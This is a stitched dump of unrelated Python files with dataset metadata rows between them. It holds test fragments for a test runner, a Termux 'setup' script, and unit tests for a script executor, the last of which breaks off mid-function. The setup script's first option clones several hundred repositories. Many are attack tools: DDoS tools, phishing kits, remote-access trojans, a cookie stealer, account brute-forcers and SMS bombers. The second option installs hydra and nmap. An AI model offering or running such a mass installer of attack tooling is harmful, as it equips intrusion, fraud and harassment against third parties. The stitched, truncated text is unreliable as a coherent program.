with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"failed.py", self.script_path, self.report_path)
ok_(len(os.listdir(self.report_path)) > 0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_with_report_success_03(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"notdefine.py", self.script_path, self.report_path)
ok_(len(os.listdir(self.report_path)) == 0)
@with_setup(setup, teardown)
def test_atvetestrunner_execute_with_report_success_04(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"notdefine", self.script_path, self.report_path)
ok_(len(os.listdir(self.report_path)) == 0)
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_with_report_failed_01(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"notexists.py", self.script_path, self.report_path)
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_with_report_failed_02(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"success.py", self.workspace.mkdir("script"), self.report_path)
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_with_report_failed_03(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"success.py", self.script_path, os.path.join(self.workspace.root(), "hoge"))
@with_setup(setup, teardown)
@raises(TestRunnerError)
def test_atvetestrunner_execute_with_report_failed_04(self):
with mock.patch('sys.argv', ['atvetestrunner.py', 'notdefine.py']):
self.runner.execute_with_report(
"not.pydefine", self.script_path, self.report_path)
| 42.052632 | 92 | 0.683354 | 590 | 4,794 | 5.308475 | 0.098305 | 0.044061 | 0.086845 | 0.105364 | 0.847382 | 0.810026 | 0.776501 | 0.771392 | 0.771392 | 0.755428 | 0 | 0.009759 | 0.187735 | 4,794 | 113 | 93 | 42.424779 | 0.794556 | 0 | 0 | 0.510638 | 0 | 0 | 0.132874 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.180851 | false | 0 | 0.074468 | 0 | 0.265957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ee90d2d7e748ff35d9b66c4f52534e2db7725491 | 44 | py | Python | sample_image_converter/image_converter/__init__.py | Hiroshiba/instant_api | d0916582b1d73558e6ecacc5f6bea8a142ffca31 | [
"MIT"
] | 1 | 2017-09-09T23:25:38.000Z | 2017-09-09T23:25:38.000Z | sample_image_converter/image_converter/__init__.py | Hiroshiba/tornado_instant_webapi | d0916582b1d73558e6ecacc5f6bea8a142ffca31 | [
"MIT"
] | null | null | null | sample_image_converter/image_converter/__init__.py | Hiroshiba/tornado_instant_webapi | d0916582b1d73558e6ecacc5f6bea8a142ffca31 | [
"MIT"
] | null | null | null | from .image_converter import ImageConverter
| 22 | 43 | 0.886364 | 5 | 44 | 7.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 44 | 1 | 44 | 44 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a0007963b4f9c9ee3078a7d055c42d952912791a | 30 | py | Python | src/brouwers/awards/tests/factories.py | modelbrouwers/modelbrouwers | e0ba4819bf726d6144c0a648fdd4731cdc098a52 | [
"MIT"
] | 6 | 2015-03-03T13:23:07.000Z | 2021-12-19T18:12:41.000Z | src/brouwers/awards/tests/factories.py | modelbrouwers/modelbrouwers | e0ba4819bf726d6144c0a648fdd4731cdc098a52 | [
"MIT"
] | 95 | 2015-02-07T00:55:39.000Z | 2022-02-08T20:22:05.000Z | src/brouwers/awards/tests/factories.py | modelbrouwers/modelbrouwers | e0ba4819bf726d6144c0a648fdd4731cdc098a52 | [
"MIT"
] | 2 | 2016-03-22T16:53:26.000Z | 2019-02-09T22:46:04.000Z | from .factory_models import *
| 15 | 29 | 0.8 | 4 | 30 | 5.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4e5f0eeb0028587fba1d9dbbe32d5420501ef6df | 35 | py | Python | LinkShort/__init__.py | Tch1b0/LinkShort-python-lib | 0bf3b247c4d8a4f271dd43b0647ae25444f1501a | [
"MIT"
] | null | null | null | LinkShort/__init__.py | Tch1b0/LinkShort-python-lib | 0bf3b247c4d8a4f271dd43b0647ae25444f1501a | [
"MIT"
] | null | null | null | LinkShort/__init__.py | Tch1b0/LinkShort-python-lib | 0bf3b247c4d8a4f271dd43b0647ae25444f1501a | [
"MIT"
] | null | null | null | from LinkShort.linker import Linker | 35 | 35 | 0.885714 | 5 | 35 | 6.2 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085714 | 35 | 1 | 35 | 35 | 0.96875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4e6b32f27b3f290ef17f2e66ed25c4c32fd774d1 | 25,960 | py | Python | a.py | mrpleak/mtk | 58c628c1608ad59875ea376e93c9b754db3eb7ec | [
"CC0-1.0"
] | null | null | null | a.py | mrpleak/mtk | 58c628c1608ad59875ea376e93c9b754db3eb7ec | [
"CC0-1.0"
] | null | null | null | a.py | mrpleak/mtk | 58c628c1608ad59875ea376e93c9b754db3eb7ec | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
###WEAPON###
os.system("clear")
print("""
_
_-' "'-,
_-' | d$$b |
_-' | $$$$ |
_-' | Y$$P |
_-'| | |
_-' _* | |
_-' |_-" __--''\ /
_-' __--' __*--'
-' __-'' __--*__-"`
| _--'' __--*"__-'`
|_--" .--=`"__-||"
| | |\\ ||
| .dUU | | \\ //
| UUUU | _|___//
| UUUU | |
     | UUUU |            | [Mrpleak termux setup]
| UUUU | |
| UUUU | |
| UUUU | |
| UUP' | |
| ___^-"`
""'
""")
time.sleep(2)
print("INSTALLATION STARTING")
time.sleep(2)
os.system("clear")
os.chdir("/data/data/com.termux/files/home")
###BANNER###
banner = """
a8888b.
d888888b.
8P"YP"Y88
8|o||o|88
8' .88
8`._.' Y8.
d/ `8b.
.dP . Y8b.
d8:' " `::88b.
d8" `Y88b
:8P ' :888
8a. : _a88P
._/"Yaa_ : .| 88P|
\ YP" `| 8P `.
/ \._____.d| .'
`--..__)888888P`._.'
               (1 - Install tools)
               (2 - Install commands)
               (3 - Exit)
"""
print(banner)
secim = input("Make a selection: ")
if secim == "1":
    # Tool repositories to clone (duplicate entries removed)
    repos = [
        "https://github.com/ShuBhamg0sain/Hack_CCTV_Cam-v.3.git",
        "https://github.com/ShuBhamg0sain/trace-ip.git",
        "https://github.com/ShuBhamg0sain/SMSbomber.git",
        "https://github.com/Silent-Blue/Wordlist-Creator.git",
        "https://github.com/ShuBhamg0sain/wifi-passlist.git",
        "https://github.com/ShuBhamg0sain/hack-wifi.git",
        "https://github.com/ShuBhamg0sain/reportbug.git",
        "https://github.com/ShuBhamg0sain/virous.git",
        "https://github.com/ShuBhamg0sain/Locate.git",
        "https://github.com/ShuBhamg0sain/Facebook_hack.git",
        "https://github.com/ShuBhamg0sain/rootkalilinux-termux.git",
        "https://github.com/ShuBhamg0sain/rootubantu-termux.git",
        "https://github.com/ShuBhamg0sain/termux_Arch.git",
        "https://github.com/govolution/avet",
        "https://github.com/ShuBhamg0sain/Facebook-kit.git",
        "https://github.com/ShuBhamg0sain/Fbbrute.git",
        "https://github.com/thewhiteh4t/seeker.git",
        "https://github.com/Findomain/Findomain.git",
        "https://github.com/1aN0rmus/TekDefense-Automater.git",
        "https://github.com/1N3/BruteX.git",
        "https://github.com/1N3/Findsploit.git",
        "https://github.com/1N3/ReverseAPK.git",
        "https://github.com/1N3/Sn1per.git",
        "https://github.com/1tayH/noisy.git",
        "https://github.com/4L13199/LITEDDOS.git",
        "https://github.com/4L13199/LITESPAM.git",
        "https://github.com/4shadoww/hakkuframework.git",
        "https://github.com/4w4k3/BeeLogger.git",
        "https://github.com/4w4k3/KnockMail.git",
        "https://github.com/4w4k3/Umbrella.git",
        "https://github.com/4ZM/mfterm.git",
        "https://github.com/jimywork/djangohunter.git",
        "https://github.com/jimywork/shodanwave.git",
        "https://github.com/a0xnirudh/WebXploiter.git",
        "https://github.com/abaykan/TrackOut.git",
        "https://github.com/abbbe/sslcaudit.git",
        "https://github.com/aboul3la/Sublist3r.git",
        "https://github.com/AeonDave/doork.git",
        "https://github.com/AeonDave/sir.git",
        "https://github.com/anggialberto/xl-py.git",
        "https://github.com/alexxy/netdiscover.git",
        "https://github.com/AlisamTechnology/ATSCAN.git",
        "https://github.com/almandin/fuxploider.git",
        "https://github.com/abaykan/CrawlBox.git",
        "https://github.com/altjx/ipwn.git",
        "https://github.com/andresriancho/w3af.git",
        "https://github.com/AndroBugs/AndroBugs_Framework.git",
        "https://github.com/andyvaikunth/roxysploit.git",
        "https://github.com/AonCyberLabs/PadBuster.git",
        "https://github.com/aquynh/capstone.git",
        "https://github.com/aress31/wirespy.git",
        "https://github.com/arismelachroinos/lscript.git",
        "https://github.com/ASHWIN990/ADB-Toolkit.git",
        "https://github.com/b3-v3r/Hunner.git",
        "https://github.com/BagazMukti/Termux-Styling-Shell-Script.git",
        "https://github.com/bahaabdelwahed/killshot.git",
        "https://github.com/bdblackhat/admin-panel-finder.git",
        "https://github.com/beefproject/beef.git",
        "https://github.com/behindthefirewalls/Parsero.git",
        "https://github.com/bettercap/bettercap.git",
        "https://github.com/bleachbit/bleachbit.git",
        "https://github.com/jofpin/trape.git",
        "https://github.com/byt3bl33d3r/gcat.git",
        "https://github.com/bytezcrew/wfdroid-termux.git",
        "https://github.com/chinoogawa/fbht.git",
        "https://github.com/chrizator/netattack.git",
        "https://github.com/chrizator/netattack2.git",
        "https://github.com/CiKu370/AUXILE.git",
        "https://github.com/CiKu370/hash-generator.git",
        "https://github.com/CiKu370/hasher.git",
        "https://github.com/CiKu370/ko-dork.git",
        "https://github.com/CiKu370/OSIF.git",
        "https://github.com/cinquemb/WifiBruteCrack.git",
        "https://github.com/CISOfy/lynis.git",
        "https://github.com/citronneur/rdpy.git",
        "https://github.com/commixproject/commix.git",
        "https://github.com/cuckoosandbox/cuckoo.git",
        "https://github.com/Cvar1984/Easymap.git",
        "https://github.com/Cvar1984/Ecode.git",
        "https://github.com/Cvar1984/Hac.git",
        "https://github.com/Cvar1984/sqlscan.git",
        "https://github.com/cyberark/shimit.git",
        "https://github.com/cys3c/secHub.git",
        "https://github.com/cyweb/hammer.git",
        "https://github.com/D35m0nd142/Kadabra.git",
        "https://github.com/D35m0nd142/LFISuite.git",
        "https://github.com/D4Vinci/Clickjacking-Tester.git",
        "https://github.com/D4Vinci/Dr0p1t-Framework.git",
        "https://github.com/D4Vinci/elpscrk.git",
        "https://github.com/danielmiessler/SecLists.git",
        "https://github.com/darkoperator/dnsrecon.git",
        "https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git",
        "https://github.com/epsylon/xsser.git",
        "https://github.com/errorBrain/spamchat.git",
        "https://github.com/digininja/CeWL.git",
        "https://github.com/Dionach/CMSmap.git",
        "https://github.com/dotfighter/torshammer.git",
        "https://github.com/EarToEarOak/RTLSDR-Scanner.git",
        "https://github.com/EgeBalci/The-Eye.git",
        "https://github.com/Ekultek/Pybelt.git",
        "https://github.com/EliasOenal/multimon-ng.git",
        "https://github.com/EmpireProject/Empire.git",
        "https://github.com/EnableSecurity/sipvicious.git",
        "https://github.com/EnableSecurity/wafw00f.git",
        "https://github.com/engMaher/BAF.git",
        "https://github.com/epinna/weevely3.git",
        "https://github.com/deadbits/Intersect-2.5.git",
        "https://github.com/derv82/wifite.git",
        "https://github.com/derv82/wifite2.git",
        "https://github.com/esc0rtd3w/wifi-hacker.git",
        "https://github.com/esmog/nodexp.git",
        "https://github.com/evait-security/weeman.git",
        "https://github.com/archival-0x/dedsploit.git",
        "https://github.com/floriankunushevci/rang3r.git",
        "https://github.com/FluxionNetwork/fluxion.git",
        "https://github.com/fnord0/hURL.git",
        "https://github.com/FortyNorthSecurity/EyeWitness.git",
        "https://github.com/fwaeytens/dnsenum.git",
        "https://github.com/g0tmi1k/msfpc.git",
        "https://github.com/galauerscrew/hasherdotid.git",
        "https://github.com/galkan/crowbar.git",
        "https://github.com/Gameye98/AstraNmap.git",
        "https://github.com/Gameye98/Auxscan.git",
        "https://github.com/Gameye98/Black-Hydra.git",
        "https://github.com/Gameye98/FaDe.git",
        "https://github.com/BroNils/GoogleSearch-CLI.git",
        "https://github.com/grafov/hulk.git",
        "https://github.com/Ha3MrX/Gemail-Hack.git",
        "https://github.com/greenbone/openvas-scanner.git",
        "https://github.com/GONZOsint/Namechk.git",
        "https://github.com/Gameye98/GINF.git",
        "https://github.com/Gameye98/inther.git",
        "https://github.com/Gameye98/Lazymux.git",
        "https://github.com/Gameye98/OWScan.git",
        "https://github.com/Gameye98/santet-online.git",
        "https://github.com/Gameye98/SpazSMS.git",
        "https://github.com/gdabah/distorm.git",
        "https://github.com/GDSSecurity/wifitap.git",
        "https://github.com/geovedi/indonesian-wordlist.git",
        "https://github.com/gitdurandal/dbd.git",
        "https://github.com/GitHackTools/Leaked.git",
        "https://github.com/gkbrk/slowloris.git",
        "https://github.com/golismero/golismero.git",
        "https://github.com/googleinurl/SCANNER-INURLBR.git",
        "https://github.com/greenbone/openvas.git",
        "https://github.com/HA71/Namechk.git",
        "https://github.com/hacdias/webdav.git",
        "https://github.com/Hackplayers/4nonimizer.git",
        "https://github.com/the-robot/sqliv.git",
        "https://github.com/hashcat/hashcat.git",
        "https://github.com/hashcat/maskprocessor.git",
        "https://github.com/hatRiot/zarp.git",
        "https://github.com/Hax4us/Metasploit_termux.git",
        "https://github.com/Hax4us/Nethunter-In-Termux.git",
        "https://github.com/Hax4us/TermuxAlpine.git",
        "https://github.com/Hood3dRob1n/BinGoo.git",
        "https://github.com/Hydra7/Planetwork-DDOS.git",
        "https://github.com/i3visio/osrframework.git",
        "https://github.com/ihebski/angryFuzzer.git",
        "https://github.com/ikkebr/PyBozoCrack.git",
        "https://github.com/infobyte/faraday.git",
        "https://github.com/iniqua/plecost.git",
        "https://github.com/nccgroup/keimpx.git",
        "https://github.com/iSECPartners/sslyze.git",
        "https://github.com/JamesJGoodwin/wreckuests.git",
        "https://github.com/jaygreig86/dmitry.git",
        "https://github.com/jesparza/peepdf.git",
        "https://github.com/joswr1ght/cowpatty.git",
        "https://github.com/jothatron/blackbox.git",
        "https://github.com/JPaulMora/Pyrit.git",
        "https://github.com/jseidl/GoldenEye.git",
        "https://github.com/k4m4/kickthemout.git",
        "https://github.com/k4m4/onioff.git",
        "https://github.com/kamorin/DHCPig.git",
        "https://github.com/karulis/pybluez.git",
        "https://github.com/KeepWannabe/Remot3d.git",
        "https://github.com/kgretzky/evilginx2.git",
        "https://github.com/kuburan/txtool.git",
        "https://github.com/LandGrey/pydictor.git",
        "https://github.com/lanmaster53/recon-ng.git",
        "https://github.com/laramies/theHarvester.git",
        "https://github.com/larsbrinkhoff/httptunnel.git",
        "https://github.com/leapsecurity/InSpy.git",
        "https://github.com/lgandx/Responder.git",
        "https://github.com/lightos/credmap.git",
        "https://github.com/linkedin/qark.git",
        "https://github.com/LionSec/wifresti.git",
        "https://github.com/LionSec/xerosploit.git",
        "https://github.com/LOoLzeC/Evil-create-framework.git",
        "https://github.com/LOoLzeC/SH33LL.git",
        "https://github.com/m4ll0k/Infoga.git",
        "https://github.com/m4rktn/zeroeye.git",
        "https://github.com/m8r0wn/subscraper.git",
        "https://github.com/maldevel/IPGeoLocation.git",
        "https://github.com/Manisso/Crips.git",
        "https://github.com/Manisso/Xshell.git",
        "https://github.com/Manisso/fsociety.git",
        "https://github.com/mitmproxy/mitmproxy.git",
        "https://github.com/mnp/xspy.git",
        "https://github.com/Moham3dRiahi/Th3inspector.git",
        "https://github.com/Moham3dRiahi/XAttacker.git",
        "https://github.com/moxie0/sslstrip.git",
        "https://github.com/moyix/creddump.git",
        "https://github.com/Mr-Un1k0d3r/DKMC.git",
        "https://github.com/Hendriyawan/FBUPv2.0.git",
        "https://github.com/MrSqar-Ye/BadMod.git",
        "https://github.com/mschwager/fierce.git",
        "https://github.com/mteg/braa.git",
        "https://github.com/nathanlopez/Stitch.git",
        "https://github.com/nccgroup/demiguise.git",
        "https://github.com/nccgroup/Winpayloads.git",
        "https://github.com/Neo-Oli/termux-ubuntu.git",
        "https://github.com/Neohapsis/bbqsql.git",
        "https://github.com/neoneggplant/EggShell.git",
        "https://github.com/nfc-tools/mfcuk.git",
        "https://github.com/nfc-tools/mfoc.git",
        "https://github.com/nmilosev/termux-fedora.git",
        "https://github.com/NullArray/AutoSploit.git",
        "https://github.com/nxxxu/AutoPixieWps.git",
        "https://github.com/offensive-security/exploitdb.git",
        "https://github.com/OJ/gobuster.git",
        "https://github.com/orgcandman/Simple-Fuzzer.git",
        "https://github.com/OWASP/OWASP-WebScarab.git",
        "https://github.com/OWASP/QRLJacking.git",
        "https://github.com/P0cL4bs/WiFi-Pumpkin.git",
        "https://github.com/p4kl0nc4t/Spammer-Grab.git",
        "https://github.com/pasahitz/zirikatu.git",
        "https://github.com/peterpt/eternal_scanner.git",
        "https://github.com/peterpt/get.git",
        "https://github.com/portcullislabs/enum4linux.git",
        "https://github.com/PowerScript/KatanaFramework.git",
        "https://github.com/PowerShellMafia/PowerSploit.git",
        "https://github.com/qunxyz/proxystrike.git",
        "https://github.com/r00t-3xp10it/FakeImageExploiter.git",
        "https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git",
        "https://github.com/r00t-3xp10it/morpheus.git",
        "https://github.com/r00t-3xp10it/trojanizer.git",
        "https://github.com/r00tmars/ExploitOnCLI.git",
        "https://github.com/r00tmars/XPL-SEARCH.git",
        "https://github.com/Rajkumrdusad/MyServer.git",
        "https://github.com/Rajkumrdusad/Tool-X.git",
        "https://github.com/rand0m1ze/ezsploit.git",
        "https://github.com/ReFirmLabs/binwalk.git",
        "https://github.com/threat9/routersploit.git",
        "https://github.com/reyammer/shellnoob.git",
        "https://github.com/rezasp/joomscan.git",
        "https://github.com/Rhi7/shell-scan.git",
        "https://github.com/ring0lab/catphish.git",
        "https://github.com/riverloopsec/killerbee.git",
        "https://github.com/robertdavidgraham/masscan.git",
        "https://github.com/robertswiecki/intrace.git",
        "https://github.com/ron190/jsql-injection.git",
        "https://github.com/royhills/arp-scan.git",
        "https://github.com/s0lst1c3/eaphammer.git",
        "https://github.com/ruped24/killchain.git",
        "https://github.com/s0md3v/Blazy.git",
        "https://github.com/s0md3v/Hash-Buster.git",
        "https://github.com/s0md3v/sqlmate.git",
        "https://github.com/s0md3v/Striker.git",
        "https://github.com/s0md3v/XSStrike.git",
        "https://github.com/sabri-zaki/EasY_HaCk.git",
        "https://github.com/samratashok/nishang.git",
        "https://github.com/samyk/pwnat.git",
        "https://github.com/sandalpenyok/kojawafft.git",
        "https://github.com/Sanix-Darker/DDosy.git",
        "https://github.com/savio-code/fern-wifi-cracker.git",
        "https://github.com/savio-code/ghost-phisher.git",
        "https://github.com/Screetsec/Brutal.git",
        "https://github.com/Screetsec/Dracnmap.git",
        "https://github.com/Screetsec/LALIN.git",
        "https://github.com/Screetsec/TheFatRat.git",
        "https://github.com/Screetsec/Vegile.git",
        "https://github.com/secretsquirrel/the-backdoor-factory.git",
        "https://github.com/securestate/termineter.git",
        "https://github.com/sensepost/kwetza.git",
        "https://github.com/shawarkhanethicalhacker/D-TECT-1.git",
        "https://github.com/ShawnDEvans/smbmap.git",
        "https://github.com/shekyan/slowhttptest.git",
        "https://github.com/shinnok/johnny.git",
        "https://github.com/SilentGhostX/HT-WPS-Breaker.git",
        "https://github.com/SilverFoxx/PwnSTAR.git",
        "https://github.com/silverhat007/termux-wordpresscan.git",
        "https://github.com/simsong/bulk_extractor.git",
        "https://github.com/siruidops/uidsploit.git",
        "https://github.com/Smaash/fuckshitup.git",
        "https://github.com/Smaash/snitch.git",
        "https://github.com/Souhardya/Zerodoor.git",
        "https://github.com/SpiderLabs/deblaze.git",
        "https://github.com/SpiderLabs/jboss-autopwn.git",
        "https://github.com/sqlmapproject/sqlmap.git",
        "https://github.com/st42/termux-sudo.git",
        "https://github.com/stamparm/DSSS.git",
        "https://github.com/stamparm/DSVW.git",
        "https://github.com/stamparm/DSXS.git",
        "https://github.com/steve-m/kalibrate-rtl.git",
        "https://github.com/StreetSec/Gloom-Framework.git",
        "https://github.com/sullo/nikto.git",
        "https://github.com/SusmithKrishnan/cpscan.git",
        "https://github.com/SusmithKrishnan/torghost.git",
        "https://github.com/swisskyrepo/Wordpresscan.git",
        "https://github.com/t6x/reaver-wps-fork-t6x.git",
        "https://github.com/utkusen/leviathan.git",
        "https://github.com/The404Hacking/websploit.git",
        "https://github.com/thehackingsage/hacktronian.git",
        "https://github.com/ThoughtfulDev/EagleEye.git",
        "https://github.com/tiagorlampert/CHAOS.git",
        "https://github.com/tiagorlampert/sAINT.git",
        "https://github.com/tomac/yersinia.git",
        "https://github.com/trustedsec/ridenum.git",
        "https://github.com/trustedsec/social-engineer-toolkit.git",
        "https://github.com/Tuhinshubhra/CMSeeK.git",
        "https://github.com/Tuhinshubhra/fbvid.git",
        "https://github.com/Tuhinshubhra/RED_HAWK.git",
        "https://github.com/Tuhinshubhra/shellstack.git",
        "https://github.com/Cyb0r9/Androspy.git",
        "https://github.com/Cyb0r9/SocialBox.git",
        "https://github.com/twelvesec/gasmask.git",
        "https://github.com/s0md3v/Breacher.git",
        "https://github.com/s0md3v/ReconDog.git",
        "https://github.com/UndeadSec/EvilURL.git",
        "https://github.com/UndeadSec/GoblinWordGenerator.git",
        "https://github.com/UndeadSec/SocialFish.git",
        "https://github.com/urbanadventurer/bing-ip2hosts.git",
        "https://github.com/urbanadventurer/WhatWeb.git",
        "https://github.com/ustayready/CredSniper.git",
        "https://github.com/v1s1t0r1sh3r3/airgeddon.git",
        "https://github.com/vanhauser-thc/thc-ipv6.git",
        "https://github.com/vecna/sniffjoke.git",
        "https://github.com/verluchie/termux-lazysqlmap.git",
        "https://github.com/volatilityfoundation/volatility.git",
        "https://github.com/Wh1t3Rh1n0/air-hammer.git",
        "https://github.com/wifiphisher/wifiphisher.git",
        "https://github.com/wiire-a/pixiewps.git",
        "https://github.com/WiPi-Hunter/PiDense.git",
        "https://github.com/wireghoul/doona.git",
        "https://github.com/wireghoul/dotdotpwn.git",
        "https://github.com/wpscanteam/wpscan.git",
        "https://github.com/x90skysn3k/brutespray.git",
        "https://github.com/xHak9x/fbi.git",
        "https://github.com/xmendez/wfuzz.git",
        "https://github.com/xtr4nge/giskismet.git",
        "https://github.com/Xyl2k/Cookie-stealer.git",
        "https://github.com/Zapotek/cdpsnarf.git",
        "https://github.com/zaproxy/zaproxy.git",
        "https://github.com/zerosum0x0/koadic.git",
        "https://github.com/zigoo0/webpwn3r.git",
    ]
    for repo in repos:
        os.system("git clone " + repo)
    os.system("clear")
elif secim == "2":
    os.system("termux-setup-storage")
    os.system("pkg install root-repo unstable-repo x11-repo -y")
    os.system("apt update -y")
    os.system("apt upgrade -y")
    os.system("pkg install git -y")
    os.system("pkg install python python2 python3 -y")
    os.system("pkg install pip")
    os.system("apt install purge-repo -y")
    os.system("pkg install php -y")
    os.system("pkg install perl -y")
    os.system("pkg install nano -y")
    os.system("pkg install vim -y")
    os.system("pkg install coreutils -y")  # 'cat' is provided by coreutils, not a standalone package
    os.system("pkg install pip2 -y")
    os.system("pip install wordlist")  # pip has no -y option
    os.system("pkg install nmap -y")
    os.system("pkg install hydra -y")
    os.system("pkg install openssl -y")
    os.system("apt install nodejs -y")
    os.system("clear")
elif secim == "3":
    os.system("clear")
else:
    print("Please make a valid selection!")
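Option 1 above fires one `git clone` per repository through `os.system` and silently ignores failures. A minimal alternative sketch using `subprocess` that collects failed clones for reporting (the `clone_all` helper and its name are illustrative, not part of this script):

```python
import subprocess

def clone_all(repos, dest="."):
    """Clone each repository URL in `repos` into `dest`; return the URLs that failed."""
    failed = []
    for url in repos:
        # Passing an argument list (no shell) avoids quoting problems in URLs
        result = subprocess.run(["git", "clone", url], cwd=dest)
        if result.returncode != 0:
            failed.append(url)
    return failed
```

With a helper like this, the installer can print the failed URLs at the end instead of losing them in the scrollback.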
# src/tests/executor_test.py
import time
import unittest

from execution import executor
from execution.executor import ScriptExecutor
from react.observable import _StoringObserver, read_until_closed
from tests.test_utils import _MockProcessWrapper, create_config_model, create_script_param_config

BUFFER_FLUSH_WAIT_TIME = (executor.TIME_BUFFER_MS * 1.5) / 1000.0
class TestBuildCommandArgs(unittest.TestCase):
    def test_no_parameters_no_values(self):
        config = create_config_model('config_x')
        args_string = executor.build_command_args({}, config)
        self.assertEqual(args_string, [])

    def test_no_parameters_some_values(self):
        config = create_config_model('config_x')
        args_string = executor.build_command_args({'p1': 'value', 'p2': 'value'}, config)
        self.assertEqual(args_string, [])

    def test_one_parameter_no_values(self):
        config = create_config_model('config_x', parameters=[create_script_param_config('param1')])
        args_string = executor.build_command_args({}, config)
        self.assertEqual(args_string, [])

    def test_one_parameter_one_value(self):
        config = create_config_model('config_x', parameters=[create_script_param_config('p1')])
        args_string = executor.build_command_args({'p1': 'value'}, config)
        self.assertEqual(args_string, ['value'])

    def test_one_parameter_with_param(self):
        parameter = create_script_param_config('p1', param='-p1')
        config = create_config_model('config_x', parameters=[parameter])
        args_string = executor.build_command_args({'p1': 'value'}, config)
        self.assertEqual(args_string, ['-p1', 'value'])

    def test_one_parameter_flag_no_value(self):
        parameter = create_script_param_config('p1', param='--flag', no_value=True)
        config = create_config_model('config_x', parameters=[parameter])
        args_string = executor.build_command_args({}, config)
        self.assertEqual(args_string, [])

    def test_one_parameter_flag_false(self):
        parameter = create_script_param_config('p1', param='--flag', no_value=True)
        config = create_config_model('config_x', parameters=[parameter])
        args_string = executor.build_command_args({'p1': False}, config)
        self.assertEqual(args_string, [])

    def test_one_parameter_flag_true(self):
        parameter = create_script_param_config('p1', param='--flag', no_value=True)
        config = create_config_model('config_x', parameters=[parameter])
        args_string = executor.build_command_args({'p1': True}, config)
        self.assertEqual(args_string, ['--flag'])

    def test_parameter_constant(self):
        parameter = create_script_param_config('p1', constant=True, default='const')
        config = create_config_model('config_x', parameters=[parameter])
        args_string = executor.build_command_args({'p1': 'value'}, config)
        self.assertEqual(args_string, ['const'])

    def test_parameter_int(self):
        parameter = create_script_param_config('p1', param='-p1', type='int')
        config = create_config_model('config_x', parameters=[parameter])
        args_string = executor.build_command_args({'p1': 5}, config)
        self.assertEqual(args_string, ['-p1', 5])

    def test_parameter_multiselect_when_empty_string(self):
        parameter = create_script_param_config('p1', param='-p1', type='multiselect')
        config = create_config_model('config_x', parameters=[parameter])
        args_list = executor.build_command_args({'p1': ''}, config)
        self.assertEqual(args_list, [])

    def test_parameter_multiselect_when_empty_list(self):
        parameter = create_script_param_config('p1', param='-p1', type='multiselect')
        config = create_config_model('config_x', parameters=[parameter])
        args_list = executor.build_command_args({'p1': []}, config)
        self.assertEqual(args_list, [])

    def test_parameter_multiselect_when_single_list(self):
        parameter = create_script_param_config('p1', param='-p1', type='multiselect')
        config = create_config_model('config_x', parameters=[parameter])
        args_list = executor.build_command_args({'p1': ['val1']}, config)
        self.assertEqual(args_list, ['-p1', 'val1'])

    def test_parameter_multiselect_when_single_list_as_multiarg(self):
        parameter = create_script_param_config('p1', param='-p1', type='multiselect')
        config = create_config_model('config_x', parameters=[parameter])
        args_list = executor.build_command_args({'p1': ['val1']}, config)
        self.assertEqual(args_list, ['-p1', 'val1'])

    def test_parameter_multiselect_when_multiple_list(self):
        parameter = create_script_param_config('p1', type='multiselect')
        config = create_config_model('config_x', parameters=[parameter])
        args_list = executor.build_command_args({'p1': ['val1', 'val2', 'hello world']}, config)
        self.assertEqual(args_list, ['val1,val2,hello world'])

    def test_parameter_multiselect_when_multiple_list_and_custom_separator(self):
        parameter = create_script_param_config('p1', type='multiselect', multiselect_separator='; ')
